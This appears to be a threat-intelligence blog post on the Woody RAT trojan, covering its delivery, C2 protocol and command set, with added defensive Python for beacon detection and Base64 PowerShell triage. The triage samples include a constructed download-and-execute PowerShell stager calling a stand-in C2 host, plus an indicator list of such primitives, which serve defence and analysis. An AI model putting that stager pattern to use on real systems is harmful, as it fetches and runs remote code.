Executive Summary
Malwarebytes recently reported on Woody RAT, a RAT being used to target entities in Russia.
Key Takeaways
- Woody RAT is a remote access trojan targeting entities in Russia.
- It is delivered via archive files or weaponized Office documents leveraging the Follina exploit.
- Woody RAT uses HTTP requests to communicate with the C2 and encrypts C2 communications.
What is Woody RAT?
Woody RAT is a newly discovered remote access trojan. According to Malwarebytes, it has been active in the wild for at least one year. Woody RAT is being delivered via phishing lures in archive file format and Office documents leveraging the Follina vulnerability. The threat actors behind Woody RAT targeted Obyedinyonnaya Aviastroitelnaya Korporatsiya (OAK), an aerospace and defense entity in Russia.
Woody RAT is disguised as an executable or application when delivered via archive files. Woody RAT is also delivered via Microsoft Office documents leveraging the Follina vulnerability, with lures pertaining to information security. Malwarebytes analysts noted that Woody RAT employs anti-reversing techniques, as several of the CRT functions are statically linked. Prior to initialization, Woody RAT suppresses error reporting by calling SetErrorMode with the parameter set to 0x8007. Because Woody RAT uses multiple threads, it allocates a global object and guards it with a mutex so that conflicting operations cannot run at the same time; this also ensures that only one thread is contacting the C2 at a given time.
Woody RAT uses HTTP requests to communicate with the C2. These are described in more detail below. It also uses machine-specific values to derive a cookie that identifies each victim machine. These values include adapter information, computer name and volume, with 8 random bytes appended to the value. To evade detection by network-based monitoring, Woody RAT uses a combination of RSA-4096 and AES-CBC to encrypt C2 communications. After creating command threads, Woody RAT uses Process Hollowing to delete itself from the disk.
C2 HTTP Endpoint Requests
Woody RAT leverages multiple C2 HTTP endpoint requests, including the following:
- Knock - Woody RAT uses this as the first HTTP request sent to the C2. Woody RAT sends the machine-specific cookie described above. Data received as a response contains the URL path to submit additional information from the victim machine.
- Submit - Used to submit information about the victim machine. Data sent includes the OS, architecture, antivirus information, computer name, OS version, .NET information, PowerShell information, Python version and install path, storage drive information, environment variables, network interfaces, administrator privileges, running processes, proxy information, username, and a list of user accounts. Woody RAT currently detects six antivirus products - Avast Software, Doctor Web, Kaspersky, AVG, ESET, and Sophos.
- Ping - Woody RAT regularly pings the C2 with an HTTP GET request and awaits the C2 response to determine which commands should be executed. These commands are listed in the next section.
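Two of the properties described above (the regular GET "ping" to the C2, and request bodies that are RSA/AES ciphertext rather than readable form data) are what a network defender can still observe even though the content is encrypted. The following is an added triage example, not code from Malwarebytes or PolySwarm: it runs over a constructed proxy log (the log layout, the paths /knock, /submit and /ping, and the hosts are assumptions, not Woody RAT's real values) and flags clients whose GETs to a host arrive at near-constant intervals, plus POST bodies whose byte entropy is close to that of random data.

```python
"""Added example: detect periodic GET beacons and opaque (encrypted-looking)
POST bodies in HTTP proxy logs. Sample log lines are constructed; the log
format, paths and hostnames are assumptions for illustration only."""
import base64
import hashlib
import math
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Assumed log layout: ISO timestamp, client IP, method, host, path, Base64 body or "-".
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) (?P<body>\S+)$"
)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the maximum, reached only by uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse(lines):
    """Yield one dict per well-formed log line; the body is decoded to bytes."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.fromisoformat(rec["ts"])
        rec["body"] = b"" if rec["body"] == "-" else base64.b64decode(rec["body"])
        yield rec


def find_periodic_gets(records, min_requests=5, max_cv=0.15):
    """Map (src, host) -> mean interval in seconds for clients whose GETs to a host
    are evenly spaced (coefficient of variation of the gaps <= max_cv)."""
    by_pair = defaultdict(list)
    for r in records:
        if r["method"] == "GET":
            by_pair[(r["src"], r["host"])].append(r["ts"])
    hits = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            hits[pair] = round(mean, 1)
    return hits


def find_opaque_bodies(records, min_len=64, min_entropy=7.0):
    """Return (src, host, path) for POST bodies large enough to judge and with
    entropy near that of ciphertext; readable form data scores far lower."""
    return [
        (r["src"], r["host"], r["path"])
        for r in records
        if r["method"] == "POST" and len(r["body"]) >= min_len
        and shannon_entropy(r["body"]) >= min_entropy
    ]


def _line(ts, src, method, host, path, body=b""):
    b64 = base64.b64encode(body).decode() if body else "-"
    return f"{ts} {src} {method} {host} {path} {b64}"


# Constructed stand-in for an encrypted submit body: 512 deterministic pseudo-random bytes.
_BLOB = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(16))
# Constructed benign form body of comparable size.
_FORM = b"os=Windows+10&arch=x64&name=WORKSTATION-01&user=alice&proxy=none&av=none"

SAMPLE_LOG = (
    [
        _line("2022-08-01T12:00:00", "10.0.0.5", "GET", "c2.example.invalid", "/knock"),
        _line("2022-08-01T12:00:02", "10.0.0.5", "POST", "c2.example.invalid", "/submit", _BLOB),
    ]
    + [_line(f"2022-08-01T12:{m:02d}:00", "10.0.0.5", "GET", "c2.example.invalid", "/ping")
       for m in range(1, 7)]
    + [_line(f"2022-08-01T{t}", "10.0.0.7", "GET", "intranet.example.invalid", "/home")
       for t in ("12:00:00", "12:00:05", "12:03:10", "12:03:12", "12:10:00")]
    + [_line("2022-08-01T12:00:06", "10.0.0.7", "POST", "intranet.example.invalid", "/login", _FORM)]
)

if __name__ == "__main__":
    recs = list(parse(SAMPLE_LOG))
    print("periodic GET beacons:", find_periodic_gets(recs))
    print("opaque POST bodies:", find_opaque_bodies(recs))
```

The constant-interval check is deliberately strict; real implants often add jitter, so in practice `max_cv` is tuned per environment and combined with the opaque-body signal rather than used alone.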
C2 Commands
Woody RAT uses one thread to communicate with the C2 and another to execute commands. Woody RAT leverages events and a mutex to synchronize between the two threads.
_SET Commands include the following:
- PING - sets a sleep interval between every ping request
- PURG - the purpose of this command is unknown
- EXIT - exit command execution thread
_REQ Commands include the following:
- EXEC - executes the command received from the C2
- UPLD - uploads a file to the victim system
- INFO - submits information to the C2
- UPEX - uploads and executes a file received from the C2
- DNLD - lets the C2 download files from the victim system
- PROC - directly executes a process without using cmd.exe
- UPPR - uploads and executes a command
- SDEL - deletes files on the victim system
- _DIR - lists files and attributes in a directory
- STCK - allows the threat actor to execute a command stack of multiple commands with one request
- SCRN - takes a screenshot of the desktop
- INJC - process injection
- PSLS - retrieves an array of all running processes
- DMON - creates a process
- UPDM - allows the C2 to upload a process and then executes it using DMON
SharpExecutor and PowerSession Commands
Woody RAT has two embedded .DLL files. WoodySharpExecutor allows the malware to run .NET code received from the C2. WoodyPowerSession allows the malware to execute PowerShell commands and scripts received from the C2.
Commands leveraging these .DLL files include the following:
- DN_B - uses the RunBinaryStdout method to execute a .NET assembly with arguments received from the C2
- DN_D - gives the threat actor more control over execution
- PSSC - allows Woody RAT to receive and execute Base64 encoded PowerShell commands
- PSSS - allows Woody RAT to load and execute Base64 encoded PowerShell commands from the C2
- PSSM - allows Woody RAT to receive an array of Base64 encoded strings, including the module name and contents
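The PSSC, PSSS and PSSM commands above all carry PowerShell as Base64 strings, so an analyst working from a decrypted capture or a memory dump needs to decode those strings before reading them. The following is an added analyst helper, not code from Woody RAT or from Malwarebytes' analysis: it repairs padding, decodes with the UTF-16LE encoding PowerShell itself uses for encoded commands (falling back to UTF-8), and flags a small set of download-and-execute indicators. The sample payloads are constructed, and the indicator list is an assumed starting set.

```python
"""Added example: decode Base64-wrapped PowerShell payloads and flag common
download-and-execute indicators. Samples are constructed for illustration."""
import base64
import binascii
import re

# Assumed starting indicator set; extend for your environment.
INDICATORS = [
    r"\bIEX\b", r"Invoke-Expression", r"DownloadString", r"DownloadFile",
    r"FromBase64String", r"Invoke-WebRequest", r"-(?:nop|noprofile)\b",
    r"Add-Type", r"Reflection\.Assembly",
]
_INDICATOR_RE = re.compile("|".join(INDICATORS), re.IGNORECASE)


def encode_ps_b64(script: str, encoding: str = "utf-16le") -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE)."""
    return base64.b64encode(script.encode(encoding)).decode("ascii")


def decode_ps_b64(blob: str) -> str:
    """Decode a Base64 PowerShell payload.

    Strips whitespace, restores missing '=' padding, rejects non-Base64 input,
    and picks UTF-16LE when most odd-position bytes are NUL (the signature of
    UTF-16LE ASCII text); otherwise decodes as UTF-8 with replacement."""
    blob = re.sub(r"\s+", "", blob)
    blob += "=" * (-len(blob) % 4)
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError("not valid Base64") from exc
    if len(raw) >= 2 and len(raw) % 2 == 0:
        odd = raw[1::2]
        if sum(b == 0 for b in odd) / len(odd) > 0.5:
            return raw.decode("utf-16le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def triage(payloads):
    """Return one record per payload with the decoded text and matched indicators
    (lower-cased and de-duplicated); undecodable input is reported, not raised."""
    out = []
    for p in payloads:
        try:
            text = decode_ps_b64(p)
        except ValueError as exc:
            out.append({"decoded": None, "indicators": [], "error": str(exc)})
            continue
        hits = sorted({m.group(0).lower() for m in _INDICATOR_RE.finditer(text)})
        out.append({"decoded": text, "indicators": hits, "error": None})
    return out


# Constructed samples: a benign one-liner, a download-and-execute stager,
# a UTF-8 encoded script using FromBase64String, and corrupt input.
SAMPLES = [
    encode_ps_b64("Get-Process | Select-Object Name, Id"),
    encode_ps_b64("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s.ps1')"),
    encode_ps_b64("Write-Output ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aGk=')))", "utf-8"),
    "not base64!!",
]

if __name__ == "__main__":
    for rec in triage(SAMPLES):
        print(rec)
```

Keep the decoder separate from the indicator match: the decoded text is what goes into the report, while the indicator list is only a first-pass prioritisation and will not catch obfuscated scripts on its own.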
IOCs
PolySwarm has multiple samples of Woody RAT. The following CLI command searches for all Woody RAT samples in our portal:
$ polyswarm link list -f WoodyRat
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports